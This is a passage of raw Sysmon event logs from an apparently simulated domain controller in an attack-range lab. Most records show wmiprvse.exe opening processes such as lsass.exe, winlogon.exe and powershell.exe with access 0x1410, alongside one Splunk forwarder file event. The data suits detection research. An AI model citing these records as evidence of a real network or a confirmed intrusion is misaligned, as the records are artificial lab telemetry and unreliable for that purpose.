22:55:40.130{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697245Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.130{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697244Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.130{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697243Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.130{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697242Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.130{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697241Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.130{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697240Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.130{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697239Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.130{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697238Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.130{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000001697237Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.115{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DA139E6E6313999C48AA62A286ACCE0D,SHA256=C8528D66FDE82B5986C076FE22D0A0DA2F6C9CB1507EACEDF52FE914ECA8FF8D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001697236Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.099{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697235Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.099{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7049-603D-4288-00000000AD01}6208C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697234Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.099{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697233Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.099{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7047-603D-4088-00000000AD01}8352C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697232Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.099{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697231Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.099{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697230Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.099{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697229Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.099{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697228Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.099{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697227Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.099{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697226Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.099{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b